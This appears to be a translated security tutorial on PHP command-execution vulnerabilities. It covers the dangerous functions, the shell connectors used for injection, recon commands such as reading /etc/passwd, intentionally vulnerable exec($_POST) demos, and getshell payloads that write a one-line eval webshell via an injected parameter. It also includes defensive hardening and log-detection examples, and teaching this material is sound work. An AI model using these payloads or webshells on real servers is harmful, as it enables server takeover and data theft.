In-depth study of network security, lesson 1 - Popular framework vulnerabilities (RCE - Command Execution)


1. RCE

------ Remote command execution or code execution. Because the term RCE is used loosely, its scope is fairly wide: as long as the end result of a penetration is the execution of commands or code, it counts as RCE, for example code execution, file inclusion, deserialization and command execution; even writing a file to get a shell (getshell) can count as RCE.

------ The RCE vulnerability allows an attacker to remotely inject operating system commands or code directly into the backend server, thereby controlling the backend system.


2. Command Execution/Injection-Overview

------ Applications sometimes need to call functions that execute system commands, such as system, exec, shell_exec, passthru and popen in PHP. When user input reaches these functions, malicious system commands can be spliced into the normal command, causing a command execution attack; this is a command execution vulnerability.

------ Cause of command execution: the web application's script code does not strictly filter its input when executing commands, so an attacker can inject a piece of input they control and have malicious instructions executed on the server.

------ Command execution vulnerabilities are one of the most common vulnerabilities in PHP applications.

------ Command execution vulnerability: the application directly calls operating system commands, so a vulnerability here can execute system or application commands (such as CMD commands or bash commands). PHP command execution vulnerabilities are mainly caused by lax parameter filtering in a few functions.


3. Command execution-common functions

Common command execution functions:

  • PHP: exec, shell_exec, system, passthru, popen, proc_open, etc.
  • ASP.NET: System.Diagnostics.Start.Process, System.Diagnostics.Start.ProcessStartInfo, etc.
  • Java: java.lang.runtime.Runtime.getRuntime, java.lang.runtime.Runtime.exec, etc.

4. PHP command execution-common functions

1. exec:

Return value: returns the last line of the command output; returns false on failure.

<?php
	// exec() runs the POST parameter q as a shell command and returns only
	// the last line of its output (deliberately vulnerable demo).
	echo exec($_POST["q"]);
?>
<?php
	// Same demo with print instead of echo; the output is identical.
	print exec($_POST["q"]);
?>

As the screenshot in the original post shows, only the last line is output.

2. system

------ This function outputs the execution result directly and also returns the output as a string.

------ If PHP is running as a server module, the system() function also tries to flush the web server's output buffer after each line of output; it returns false if execution fails.

<?php
	// Show this file's own source in the page, then run whoami and print it.
	highlight_file(__FILE__);
	system('whoami');
?>

The highlight_file() function returns the syntax-highlighted code as a string;
it returns true on success and false otherwise.

3. passthru

------ Executes an external program and displays its raw output. This function is used when the executed Unix command outputs binary data that must be sent directly to the browser.

<?php
	// passthru() writes the raw output of whoami straight to the response.
	highlight_file(__FILE__);
	passthru('whoami');
?>

4. shell_exec

------ Executes the command through the shell and returns the complete output as a string.

<?php
	// shell_exec() returns the whole output, so var_dump() shows it as one string.
	highlight_file(__FILE__);
	var_dump(shell_exec('ipconfig'));
?>

5. Backticks

------ The shell_exec() function is actually just a variant of the backtick (`) operator.

<?php echo `whoami`; ?>  // the text between the backticks is executed as a shell command
Here whoami is executed directly as a command.

5. PHP command execution - summary of common functions

------ Functions that can execute commands: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open(); backticks can also execute commands.

  • system(), exec(), shell_exec(), passthru() and the backtick (`) operator take the command directly and return the execution result.

e.g. <?php system('ipconfig'); ?> and <?php echo `whoami`; ?>

  • popen() and proc_open() do not return the execution result directly; they return a file pointer (through which you can read from or write to the process), but the command has still been executed.
<?php popen('whoami >>D:/2.txt','r'); ?>  // whoami runs and its output is appended to D:/2.txt even though nothing is read from the pointer

6. Causes of command execution vulnerabilities

------ This kind of vulnerability generally arises because the application is designed to give users an interface for running specific remote commands, for example the web management interfaces of common routers, firewalls, intrusion detection and similar devices. A typical case is a web page for a ping operation: the user enters a target IP in the web form and submits it, and the backend runs a ping test against that address and returns the result.

------ If the designer does not implement strict security controls when building this function, an attacker may be able to submit "unexpected" commands through the interface and have the backend execute them, thereby taking control of the entire backend server.


7. Command Execution Vulnerability Exploitation Conditions

  • Application calls functions that execute system commands
  • Splicing user input into the command line as parameters of system commands
  • No or lax filtering of user input
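The ping interface described above, as an added example that is not part of the original post: the command line is first built the vulnerable way (input spliced straight in) and then the hardened way (allow-list validation plus escapeshellarg()). Function names are assumptions for illustration; the connectors used as inputs are the ones the post itself lists.

```php
<?php
// Added example (not from the original post): the ping interface the text
// describes, in its vulnerable form and a hardened form. Function names are
// assumptions for illustration; the connectors come from the post itself.

// Vulnerable: the submitted value is spliced straight into the command line,
// so "10.0.0.1 && id" makes the shell run a second command.
function ping_command_vulnerable(string $target): string
{
    return "ping -c 1 " . $target;
}

// Hardened: (1) allow-list the value as a literal IP address, which also
// blocks extra options such as "-c 100000"; (2) quote it with
// escapeshellarg() so the shell sees exactly one argument even if the
// validation is later loosened.
function ping_command_hardened(string $target): string
{
    if (filter_var($target, FILTER_VALIDATE_IP) === false) {
        throw new InvalidArgumentException("target is not an IP address");
    }
    return "ping -c 1 " . escapeshellarg($target);
}

// Run the hardened command; exec() collects every output line in $lines,
// and $rc exposes ping's exit status to the caller instead of losing it.
function ping_hardened(string $target): array
{
    exec(ping_command_hardened($target), $lines, $rc);
    return ['status' => $rc, 'output' => $lines];
}

// Constructed inputs: one benign value, then one carrying each connector
// the post describes. Only the command line is built here, so the script
// runs without a network.
$inputs = ['10.0.0.1', '10.0.0.1 & id', '10.0.0.1 && id', '10.0.0.1 | id', '10.0.0.1 || id'];
foreach ($inputs as $in) {
    printf("vulnerable builds: %s\n", ping_command_vulnerable($in));
    try {
        printf("hardened builds:   %s\n", ping_command_hardened($in));
    } catch (InvalidArgumentException $e) {
        printf("hardened rejects:  %s (%s)\n", $in, $e->getMessage());
    }
}
```

Only the first input survives the hardened path; the other four are rejected before any shell is involved, which is the check the three conditions above are missing.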

8. Classification of command execution vulnerabilities

1. Lack of strict filtering at the code level

Some core code of commercial applications is packaged in binary files and called through system functions from the web application.

2. System vulnerabilities that cause command injection

Bash Shellshock vulnerability (CVE-2014-6271)

3. A code execution vulnerability in a called third-party component

For example: command execution in Java components (Struts2, etc.), the ImageMagick component WordPress uses to process images, and ThinkPHP command execution.


9. Commonly used commands for command execution vulnerabilities

Windows

dir----list the files in a directory
ipconfig----show the Windows IP address
arp -a----show the ARP cache table
calc----open the calculator from the command line
regedit----open the registry editor
netstat -ano----show open ports

Linux

cat /etc/passwd----view the passwd file
id----show the user's ID numbers
groups----show the groups the user belongs to
cat /etc/group----view group information
whoami----show the current user
pwd----show the current path
uname -a----show host information
cat /etc/issue----show the host's configuration information
netstat -pantu----show open ports
netstat -nr----show routing information

10. Principle of Command Execution Vulnerability

------ In the operating system, "&", "|" and "||" can be used as command connectors. The user submits a command to execute through the browser; because the server side does not filter the input to the execution function, and the command is run without an absolute path being specified, the submitted command is executed.

------ A remote command execution vulnerability means the user submits a command to execute through the browser, and because the server side does not filter the input to the execution function, the malicious command is executed.


11. Special characters used in command execution vulnerabilities

1. &

1&2 separates multiple commands on one command line: command 1 runs first, then command 2.

2. &&

1&&2 runs command 1 first, and runs command 2 after the && only if command 1 succeeded.

3. |

1|2 is the command-line pipe: the output of command 1 is used immediately as the input of command 2. It combines input and output redirection (the command after the pipe is executed directly).

4. ||

1||2 runs command 1 first, and runs command 2 after the || only if command 1 failed.
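Detection logic for the four connectors above, as an added example that is not part of the original post: it scans web-server access-log lines, URL-decodes each query parameter and reports which connectors appear in it. The log lines, the ping.php endpoint and the "ip" parameter name are constructed for illustration.

```php
<?php
// Added example (not from the original post): find the command connectors
// described above inside URL query parameters of web-server access-log
// lines. The log lines, the ping.php endpoint and the "ip" parameter name
// are constructed for illustration.
const ACCESS_LOG = <<<'LOG'
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /ping.php?ip=10.0.0.1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /ping.php?ip=10.0.0.1%20%26%26%20whoami HTTP/1.1" 200 540
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /ping.php?ip=10.0.0.1%7Cid HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /ping.php?ip=10.0.0.1%7C%7Cid HTTP/1.1" 200 530
10.0.0.9 - - [01/Jan/2024:10:00:13 +0000] "GET /search.php?q=cats%20%26%20dogs HTTP/1.1" 200 900
LOG;

// Connectors present in one decoded parameter value. The two-character
// forms are checked first so that "&&" is not reported as two "&".
function find_connectors(string $value): array
{
    $found = [];
    foreach (['&&', '||', '&', '|'] as $c) {
        if (strpos($value, $c) !== false) {
            $found[] = $c;
            $value = str_replace($c, ' ', $value);
        }
    }
    return $found;
}

// For each request line, pull out the request target, URL-decode its query
// string (parse_str turns %26 back into "&" and %7C into "|"), and record
// every parameter that carries a connector.
function scan_log(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        if (!preg_match('/^(\S+) .*"(?:GET|POST) (\S+) HTTP/', $line, $m)) continue;
        $query = parse_url($m[2], PHP_URL_QUERY);
        if (!$query) continue;
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            $found = find_connectors((string) $value);
            if ($found) $hits[] = ['client' => $m[1], 'param' => $name, 'value' => $value, 'connectors' => $found];
        }
    }
    return $hits;
}

foreach (scan_log(ACCESS_LOG) as $h) {
    printf("%s %s=%s connectors: %s\n", $h['client'], $h['param'], $h['value'], implode(' ', $h['connectors']));
}
```

The last log line shows why a lone & needs triage rather than an automatic alert: a free-text search term legitimately contains it, while a parameter that should hold an IP address never does, so pair the connector check with the parameter's expected format.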


12. Command execution vulnerability getshell

------ The attacker directly inherits the privileges of the web server user and can execute arbitrary commands on the server, which is particularly harmful.

The following are several common ways a command execution vulnerability is used:

1. Get a webshell directly

For example, write a one-line webshell (一句话木马):
?cmd=echo "<?php @eval($_REQUEST[123]); ?>" > D:\phpstudy\PHPTutorial\WWW\webshell.php

2. Display the current path

For example, submit the parameter ?cmd=cd to view the current path.

3. Read files

For example: ?cmd=type c:\windows\system32\drivers\etc\hosts views the system hosts file.

4. Write files

For example, submit the parameter ?cmd=echo "<?php phpinfo(); ?>" > D:\shell.php



Source: blog.csdn.net/p36273/article/details/132919491